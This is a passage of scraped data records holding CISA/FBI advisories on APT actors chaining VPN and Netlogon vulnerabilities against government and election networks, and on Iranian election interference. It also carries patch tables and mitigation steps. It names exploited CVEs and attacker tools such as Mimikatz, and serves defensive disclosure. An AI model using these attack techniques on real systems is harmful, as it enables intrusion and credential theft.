Citrix CVE-2019-19781", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2023-27350"], "modified": "2020-05-21T12:00:00", "id": "AA20-031A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-031a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-02T15:09:48", "description": "### Summary\n\n_This joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\n**Note:** the analysis in this joint cybersecurity advisory is ongoing, and the information provided should not be considered comprehensive. The Cybersecurity and Infrastructure Security Agency (CISA) will update this advisory as new information is available.\n\nThis joint cybersecurity advisory was written by CISA with contributions from the Federal Bureau of Investigation (FBI). \n\nCISA has recently observed advanced persistent threat (APT) actors exploiting multiple legacy vulnerabilities in combination with a newer privilege escalation vulnerability\u2014[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)\u2014in Windows Netlogon. The commonly used tactic, known as vulnerability chaining, exploits multiple vulnerabilities in the course of a single intrusion to compromise a network or application. \n\nThis recent malicious activity has often, but not exclusively, been directed at federal and state, local, tribal, and territorial (SLTT) government networks. Although it does not appear these targets are being selected because of their proximity to elections information, there may be some risk to elections information housed on government networks.\n\nCISA is aware of some instances where this activity resulted in unauthorized access to elections support systems; however, CISA has no evidence to date that integrity of elections data has been compromised. There are steps that election officials, their supporting SLTT IT staff, and vendors can take to help defend against this malicious cyber activity.\n\nSome common tactics, techniques, and procedures (TTPs) used by APT actors include leveraging legacy network access and virtual private network (VPN) vulnerabilities in association with the recent critical [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) Netlogon vulnerability. CISA is aware of multiple cases where the Fortinet FortiOS Secure Socket Layer (SSL) VPN vulnerability [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) has been exploited to gain access to networks. To a lesser extent, CISA has also observed threat actors exploiting the MobileIron vulnerability [CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>). While these exploits have been observed recently, this activity is ongoing and still unfolding.\n\nAfter gaining initial access, the actors exploit [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) to compromise all Active Directory (AD) identity services. Actors have then been observed using legitimate remote access tools, such as VPN and Remote Desktop Protocol (RDP), to access the environment with the compromised credentials. Observed activity targets multiple sectors and is not limited to SLTT entities.\n\nCISA recommends network staff and administrators review internet-facing infrastructure for these and similar vulnerabilities that have or could be exploited to a similar effect, including Juniper [CVE-2020-1631](<https://nvd.nist.gov/vuln/detail/CVE-2020-1631>), Pulse Secure [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), Citrix NetScaler [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), and Palo Alto Networks [CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>) (this list is not considered exhaustive).\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\n### Initial Access\n\nAPT threat actors are actively leveraging legacy vulnerabilities in internet-facing infrastructure (_Exploit Public-Facing Application_ [[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190/>)], _External Remote Services_ [[T1133](<https://attack.mitre.org/versions/v7/techniques/T1133/>)]) to gain initial access into systems. The APT actors appear to have predominately gained initial access via the Fortinet FortiOS VPN vulnerability [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>).\n\nAlthough not observed in this campaign, other vulnerabilities, listed below, could be used to gain network access (as analysis is evolving, these listed vulnerabilities should not be considered comprehensive). As a best practice, it is critical to patch all known vulnerabilities within internet-facing infrastructure.\n\n * Citrix NetScaler [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n * MobileIron [CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)\n * Pulse Secure [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n * Palo Alto Networks [CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>)\n * F5 BIG-IP [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)\n\n#### Fortinet FortiOS SSL VPN CVE-2018-13379\n\n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) is a path traversal vulnerability in the FortiOS SSL VPN web portal. An unauthenticated attacker could exploit this vulnerability to download FortiOS system files through specially crafted HTTP resource requests.[[1](<https://www.fortiguard.com/psirt/FG-IR-18-384>)]\n\n### MobileIron Core & Connector Vulnerability CVE-2020-15505\n\n[CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) is a remote code execution vulnerability in MobileIron Core & Connector versions 10.3 and earlier.[[2](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>)] This vulnerability allows an external attacker, with no privileges, to execute code of their choice on the vulnerable system. As mobile device management (MDM) systems are critical to configuration management for external devices, they are usually highly permissioned and make a valuable target for threat actors.\n\n### Privilege Escalation\n\nPost initial access, the APT actors use multiple techniques to expand access to the environment. The actors are leveraging [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) in Windows Netlogon to escalate privileges and obtain access to Windows AD servers. Actors are also leveraging the opensource tools such as Mimikatz and the CrackMapExec tool to obtain valid account credentials from AD servers (_Valid Accounts_ [[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078/>)]).\n\n#### Microsoft Netlogon Remote Protocol Vulnerability: CVE-2020-1472\n\n[CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) is a vulnerability in Microsoft Windows Netlogon Remote Protocol (MS-NRPC), a core authentication component of Active Directory.[[3](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)] This vulnerability could allow an unauthenticated attacker with network access to a domain controller to completely compromise all AD identity services (_Valid Accounts: Domain Accounts_ [[T1078.002](<https://attack.mitre.org/versions/v7/techniques/T1078/002/>)]). Malicious actors can leverage this vulnerability to compromise other devices on the network (_Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v7/tactics/TA0008/>)]).\n\n### Persistence\n\nOnce system access has been achieved, the APT actors use abuse of legitimate credentials (_Valid Accounts _[[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078/>)]) to log in via VPN or remote access services _(External Remote Services_ [[T1133](<https://attack.mitre.org/versions/v7/techniques/T1133/>)]) to maintain persistence.\n\n### Mitigations\n\nOrganizations with externally facing infrastructure devices that have the vulnerabilities listed in this joint cybersecurity advisory, or other vulnerabilities, should move forward with an \u201cassume breach\u201d mentality. As initial exploitation and escalation may be the only observable exploitation activity, most mitigations will need to focus on more traditional network hygiene and user management activities.\n\n### Keep Systems Up to Date\n\nPatch systems and equipment promptly and diligently. Establishing and consistently maintaining a thorough patching cycle continues to be the best defense against adversary TTPs. See table 1 for patch information on CVEs mentioned in this report.\n\n_Table 1: Patch information for CVEs_\n\n**Vulnerability** | **Vulnerable Products** | **Patch Information** \n---|---|--- \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) | \n\n * FortiOS 6.0: 6.0.0 to 6.0.4\n * FortiOS 5.6: 5.6.3 to 5.6.7\n * FortiOS 5.4: 5.4.6 to 5.4.12\n| \n\n * [Fortinet Security Advisory: FG-IR-18-384](<https://www.fortiguard.com/psirt/FG-IR-18-384>) \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | \n\n * Citrix Application Delivery Controller\n * Citrix Gateway\n * Citrix SDWAN WANOP\n| \n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0 ](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n * [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) | \n\n * Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)\n| \n\n * [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | \n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15\n * Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15\n| \n\n * [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n[CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) | \n\n * MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0 \n * Sentry versions 9.7.2 and earlier, and 9.8.0; \n * Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier\n| \n\n * [MobileIron Blog: MobileIron Security Updates Available](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>) \n[CVE-2020-1631](<https://nvd.nist.gov/vuln/detail/CVE-2020-1631>) | \n\n * Junos OS 12.3, 12.3X48, 14.1X53, 15.1, 15.1X49, 15.1X53, 17.2, 17.3, 17.4, 18.1, 18.2, 18.3, 18.4, 19.1, 19.2, 19.3, 19.4, 20.1\n| \n\n * [Juniper Security Advisory JSA11021](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11021>) \n[CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>) | \n\n * PAN-OS 9.1 versions earlier than PAN-OS 9.1.3; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9; PAN-OS 8.1 versions earlier than PAN-OS 8.1.15, and all versions of PAN-OS 8.0 (EOL)\n| \n\n * [Palo Alto Networks Security Advisory for CVE-2020-2021](<https://security.paloaltonetworks.com/CVE-2020-2021>) \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | \n\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2016\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n * Windows Server, version 2004 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) \n \n### Comprehensive Account Resets\n\nIf there is an observation of [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) Netlogon activity or other indications of valid credential abuse detected, it should be assumed the APT actors have compromised AD administrative accounts, the AD forest should not be fully trusted, and, therefore, a new forest should be deployed. Existing hosts from the old compromised forest cannot be migrated in without being rebuilt and rejoined to the new domain, but migration may be done through \u201ccreative destruction,\u201d wherein as endpoints in the legacy forest are decommissioned, new ones can be built in the new forest. This will need to be completed on on-premise as well as Azure-hosted AD instances.\n\nNote that fully resetting an AD forest is difficult and complex; it is best done with the assistance of personnel who have successfully completed the task previously.\n\nIt is critical to perform a full password reset on all user and computer accounts in the AD forest. Use the following steps as a guide.\n\n 1. Create a temporary administrator account, and use this account only for all administrative actions\n 2. Reset the Kerberos Ticket Granting Ticket (`krbtgt`) password [[4](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)]; this must be completed before any additional actions (a second reset will take place in step 5)\n 3. Wait for the krbtgt reset to propagate to all domain controllers (time may vary)\n 4. Reset all account passwords (passwords should be 15 characters or more and randomly assigned): \n\n 1. User accounts (forced reset with no legacy password reuse)\n 2. Local accounts on hosts (including local accounts not covered by Local Administrator Password Solution [LAPS])\n 3. Service accounts\n 4. Directory Services Restore Mode (DSRM) account\n 5. Domain Controller machine account\n 6. Application passwords\n 5. Reset the `krbtgt` password again\n 6. Wait for the `krbtgt` reset to propagate to all domain controllers (time may vary)\n 7. Reboot domain controllers\n 8. Reboot all endpoints\n\nThe following accounts should be reset:\n\n * AD Kerberos Authentication Master (2x)\n * All Active Directory Accounts\n * All Active Directory Admin Accounts\n * All Active Directory Service Accounts\n * All Active Directory User Accounts\n * DSRM Account on Domain Controllers\n * Non-AD Privileged Application Accounts\n * Non-AD Unprivileged Application Accounts\n * Non-Windows Privileged Accounts\n * Non-Windows User Accounts\n * Windows Computer Accounts\n * Windows Local Admin\n\n### CVE-2020-1472\n\nTo secure your organization\u2019s Netlogon channel connections:\n\n * **Update all Domain Controllers and Read Only Domain Controllers**. On August 11, 2020, Microsoft released [software updates](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) to mitigate CVE-2020-1472. Applying this update to domain controllers is currently the only mitigation to this vulnerability (aside from removing affected domain controllers from the network).\n * **Monitor for new events, and address non-compliant devices** that are using vulnerable Netlogon secure channel connections.\n * **Block public access to potentially vulnerable ports**, such as 445 (Server Message Block [SMB]) and 135 (Remote Procedure Call [RPC]).\n\nTo protect your organization against this CVE, follow [advice from Microsoft](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>), including:\n\n * Update your domain controllers with an update released August 11, 2020, or later.\n * Find which devices are making vulnerable connections by monitoring event logs.\n * Address non-compliant devices making vulnerable connections.\n * Enable enforcement mode to address [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) in your environment.\n\n### VPN Vulnerabilities\n\nImplement the following recommendations to secure your organization\u2019s VPNs:\n\n * **Update VPNs, network infrastructure devices, and devices **being used to remote into work environments with the latest software patches and security configurations. See CISA Tips [Understanding Patches and Software Updates](<https://us-cert.cisa.gov/ncas/tips/ST04-006>) and [Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>). Wherever possible, enable automatic updates. See table 1 for patch information on VPN-related CVEs mentioned in this report.\n * **Implement multi-factor authentication (MFA) on all VPN connections to increase security**. Physical security tokens are the most secure form of MFA, followed by authenticator app-based MFA. SMS and email-based MFA should only be used when no other forms are available. If MFA is not implemented, require teleworkers to use strong passwords. See CISA Tips [Choosing and Protecting Passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>) and [Supplementing Passwords](<https://us-cert.cisa.gov/ncas/tips/ST05-012>) for more information.\n\nDiscontinue unused VPN servers. Reduce your organization\u2019s attack surface by discontinuing unused VPN servers, which may act as a point of entry for attackers. To protect your organization against VPN vulnerabilities:\n\n * **Audit **configuration and patch management programs.\n * **Monitor** network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., Secure Shell [SSH], SMB, RDP).\n * **Implement **MFA, especially for privileged accounts.\n * **Use **separate administrative accounts on separate administration workstations.\n * **Keep **[software up to date](<https://us-cert.cisa.gov/ncas/tips/ST04-006>). Enable automatic updates, if available. \n\n### How to uncover and mitigate malicious activity\n\n * **Collect and remove** for further analysis: \n * Relevant artifacts, logs, and data.\n * **Implement **mitigation steps that avoid tipping off the adversary that their presence in the network has been discovered.\n * **Consider **soliciting incident response support from a third-party IT security organization to: \n * Provide subject matter expertise and technical support to the incident response.\n * Ensure that the actor is eradicated from the network.\n * Avoid residual issues that could result in follow-up compromises once the incident is closed.\n\n### Resources\n\n * [CISA VPN-Related Guidance](<https://www.cisa.gov/vpn-related-guidance>)\n * CISA Infographic: [Risk Vulnerability And Assessment (RVA) Mapped to the MITRE ATT&CK FRAMEWORK](<https://www.cisa.gov/sites/default/files/publications/Risk%20and%20Vulnerability%20Assessment%20%28RVA%29%20Mapped%20to%20the%20MITRE%20ATT%26amp%3BCK%20Framework%20Infographic_v6-100620_%20508.pdf>)\n * National Security Agency InfoSheet: [Configuring IPsec Virtual Private Networks](<https://media.defense.gov/2020/Jul/02/2002355501/-1/-1/0/CONFIGURING_IPSEC_VIRTUAL_PRIVATE_NETWORKS_2020_07_01_FINAL_RELEASE.PDF>)\n * CISA Joint Advisory: [AA20-245A: Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>)\n * CISA Activity Alert: [AA20-073A: Enterprise VPN Security](<https://us-cert.cisa.gov/ncas/alerts/aa20-073a>)\n * CISA Activity Alert: [AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)\n * CISA Activity Alert: [AA20-010A: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>)\n * **Cybersecurity Alerts and Advisories**: Subscriptions to [CISA Alerts](<https://public.govdelivery.com/accounts/USDHSUSCERT/subscriber/new>) and [MS-ISAC Advisories](<https://learn.cisecurity.org/ms-isac-subscription>)\n\n### Contact Information\n\nRecipients of this report are encouraged to contribute any additional information that they may have related to this threat.\n\nFor any questions related to this report or to report an intrusion and request resources for incident response or technical assistance, please contact:\n\n * CISA (888-282-0870 or [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>)), or\n * The FBI through the FBI Cyber Division (855-292-3937 or [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>)) or a [local field office](<https://www.fbi.gov/contact-us/field-offices/field-offices>)\n\n**_DISCLAIMER_**\n\n_This information is provided \"as is\" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information._\n\n_The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government._\n\n### References\n\n[[1] Fortinet Advisory: FG-IR-18-384 ](<https://www.fortiguard.com/psirt/FG-IR-18-384>)\n\n[[2] MobileIron Blog: MobileIron Security Updates Available](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>)\n\n[[3] Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)\n\n[[4] Microsoft: AD Forest Recovery - Resetting the krbtgt password](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)\n\n### Revisions\n\nOctober 9, 2020: Initial Version|October 11, 2020: Updated Summary|October 12, 2020: Added Additional Links\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-1631", "CVE-2020-2021", "CVE-2020-5902", "CVE-2023-27350"], "modified": "2020-10-24T12:00:00", "id": "AA20-283A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-31T15:30:52", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are warning that Iranian advanced persistent threat (APT) actors are likely intent on influencing and interfering with the U.S. elections to sow discord among voters and undermine public confidence in the U.S. electoral process.\n\nThe APT actors are creating fictitious media sites and spoofing legitimate media sites to spread obtained U.S. voter-registration data, anti-American propaganda, and misinformation about voter suppression, voter fraud, and ballot fraud.\n\nThe APT actors have historically exploited critical vulnerabilities to conduct distributed denial-of-service (DDoS) attacks, structured query language (SQL) injections attacks, spear-phishing campaigns, website defacements, and disinformation campaigns. \n\nClick here for a PDF version of this report.\n\n### Technical Details\n\nThese actors have conducted a significant number of intrusions against U.S.-based networks since August 2019. The actors leveraged several Common Vulnerabilities and Exposures (CVEs)\u2014notably [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) and [CVE-2017-9248](<https://nvd.nist.gov/vuln/detail/CVE-2017-9248>)\u2014pertaining to virtual private networks (VPNs) and content management systems (CMSs). \n\n * [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) affects F5 VPNs. Remote attackers could exploit this vulnerability to execute arbitrary code. [[1](<https://support.f5.com/csp/article/K52145254>)].\n * [CVE-2017-9248](<https://nvd.nist.gov/vuln/detail/CVE-2017-9248>) affects Telerik UI. Attackers could exploit this vulnerability in web applications using Telerik UI for ASP.NET AJAX to conduct cross-site scripting (XSS) attacks.[[2](<https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness>)]\n\nHistorically, these actors have conducted DDoS attacks, SQL injections attacks, spear-phishing campaigns, website defacements, and disinformation campaigns. These activities could render these systems temporarily inaccessible to the public or election officials, which could slow, but would not prevent, voting or the reporting of results.\n\n * **A DDoS attack **could slow or render election-related public-facing websites inaccessible by flooding the internet-accessible server with requests; this would prevent users from accessing online resources, such as voting information or non-official voting results. In the past, cyber actors have falsely claimed DDoS attacks have compromised the integrity of voting systems in an effort to mislead the public that their attack would prevent a voter from casting a ballot or change votes already cast.\n * **A SQL injection** involves a threat actor inserting malicious code into the entry field of an application, causing that code to execute if entries have not been sanitized. SQL injections are among the most dangerous and common exploits affecting websites. A SQL injection into a media company\u2019s CMS could enable a cyber actor access to network systems to manipulate content or falsify news reports prior to publication.\n * **Spear-phishing messages** may not be easily detectible. These emails often ask victims to fill out forms or verify information through links embedded in the email. APT actors use spear phishing to gain access to information\u2014often credentials, such as passwords\u2014and to identify follow-on victims. A malicious cyber actor could use compromised email access to spread disinformation to the victims\u2019 contacts or collect information sent to or from the compromised account.\n * **Public-facing website defacements** typically involve a cyber threat actor compromising the website or its associated CMS, allowing the actor to upload images to the site\u2019s landing page. In situations where such public-facing websites relate to elections (e.g., the website of a county board of elections), defacements could cast doubt on the security and legitimacy of the websites\u2019 information. If cyber actors were able to successfully change an election-related website, the underlying data and internal systems would remain uncompromised..\n * **Disinformation campaigns **involve malign actions taken by foreign governments or actors designed to sow discord, manipulate public discourse, or discredit the electoral system. Malicious actors often use social media as well as fictitious and spoofed media sites for these campaigns. Based on their corporate policies, social media companies have worked to counter these actors\u2019 use of their platforms to promote fictitious news stories by removing the news stories, and in many instances, closing the accounts related to the malicious activity. However, these adversaries will continue their attempts to create fictitious accounts that promote divisive storylines to sow discord, even after the election.\n\n### Mitigations\n\nThe following recommended mitigations list includes self-protection strategies against the cyber techniques used by the APT actors:\n\n * Validate input\u2014input validation is a method of sanitizing untrusted input provided by web application users. Implementing input validation can protect against security flaws of web applications by significantly reducing the probability of successful exploitation. Types of attacks possibly prevented include SQL injection, XSS, and command injection.\n * Audit your network for systems using Remote Desktop Protocol (RDP) and other internet-facing services. Disable the service if unneeded or install available patches. Users may need to work with their technology vendors to confirm that patches will not affect system processes.\n * Verify all cloud-based virtual machine instances with a public IP; do not have open RDP ports, unless there is a valid business reason to do so. Place any system with an open RDP port behind a firewall, and require users to use a VPN to access it through the firewall.\n * Enable strong password requirements and account lockout policies to defend against brute-force attacks.\n * Apply multi-factor authentication, when possible.\n * Apply system and software updates regularly, particularly if you are deploying products affected by CVE-2020-5902 and CVE-2017-9248. \n * For patch information on CVE-2020-5902, refer to F5 Security Advisory [K52145254](<https://support.f5.com/csp/article/K52145254>).\n * For patch information on CVE-2017-9248, refer to [Progress Telerik details for CVE-2017-9248](<https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness>).\n * Maintain a good information back-up strategy that involves routinely backing up all critical data and system configuration information on a separate device. Store the backups offline; verify their integrity and restoration process.\n * Enable logging and ensure logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days, and review them regularly to detect intrusion attempts.\n * When creating cloud-based virtual machines, adhere to the cloud provider's best practices for remote access.\n * Ensure third parties that require RDP access are required to follow internal policies on remote access.\n * Minimize network exposure for all control system devices. Where possible, critical devices should not have RDP enabled.\n * Regulate and limit external to internal RDP connections. When external access to internal resources is required, use secure methods, such as VPNs, recognizing VPNs are only as secure as the connected devices.\n * Be aware of unsolicited contact on social media from any individual you do not know.\n * Be aware of attempts to pass links or files via social media from anyone you do not know.\n * Be aware of unsolicited requests to share a file via online services.\n * Be aware of email messages conveying suspicious alerts or other online accounts, including login notifications from foreign countries or other alerts indicating attempted unauthorized access to your accounts.\n * Be suspicious of emails purporting to be from legitimate online services (e.g., the images in the email appear to be slightly pixelated and/or grainy, language in the email seems off, the email originates from an IP address not attributable to the provider/company).\n * Be suspicious of unsolicited email messages that contain shortened links (e.g., via `tinyurl`, `bit.ly`).\n * Use security features provided by social media platforms, use [strong passwords](<https://us-cert.cisa.gov/ncas/current-activity/2018/03/27/Creating-and-Managing-Strong-Passwords>), change passwords frequently, and use a different password for each social media account.\n * See CISA\u2019s [Tip on Best Practices for Securing Election Systems](<https://us-cert.cisa.gov/ncas/tips/ST19-002>) for more information.\n\n#### General Mitigations\n\n##### Keep applications and systems updated and patched\n\nApply all available software updates and patches; automate this process to the greatest extent possible (e.g., by using an update service provided directly from the vendor). Automating updates and patches is critical because of the speed at which threat actors create exploits after a patch is released. These \u201cN-day\u201d exploits can be as damaging as a zero-day exploits. Vendor updates must also be authentic; updates are typically signed and delivered over protected links to ensure the integrity of the content. Without rapid and thorough patch application, threat actors can operate inside a defender\u2019s patch cycle.[[3](<https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf?v=1>)] In addition to updating the application, use tools (e.g., the OWASP Dependency-Check Project tool[[4](<https://owasp.org/www-project-dependency-check/>)]) to identify publicly known vulnerabilities in third-party libraries that the application depends on.\n\n##### Scan web applications for SQL injection and other common web vulnerabilities\n\nImplement a plan to scan public-facing web servers for common web vulnerabilities (SQL injection, cross-site scripting, etc.); use a commercial web application vulnerability scanner in combination with a source code scanner.[[5](<https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/defending-against-the-exploitation-of-sql-vulnerabilities-to.cfm>)] As vulnerabilities are found, they should be fixed or patched. This is especially crucial for networks that host older web applications; as sites get older, more vulnerabilities are discovered and exposed.\n\n##### Deploy a web application firewall \n\nDeploy a web application firewall (WAF) to help prevent invalid input attacks and other attacks destined for the web application. WAFs are intrusion/detection/prevention devices that inspect each web request made to and from the web application to determine if the request is malicious. Some WAFs install on the host system and others are dedicated devices that sit in front of the web application. WAFs also weaken the effectiveness of automated web vulnerability scanning tools.\n\n##### Deploy techniques to protect against web shells\n\nPatch web application vulnerabilities or fix configuration weaknesses that allow web shell attacks, and follow guidance on detecting and preventing web shell malware.[[6](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF>)] Malicious cyber actors often deploy web shells\u2014software that can enable remote administration\u2014on a victim\u2019s web server. Malicious cyber actors 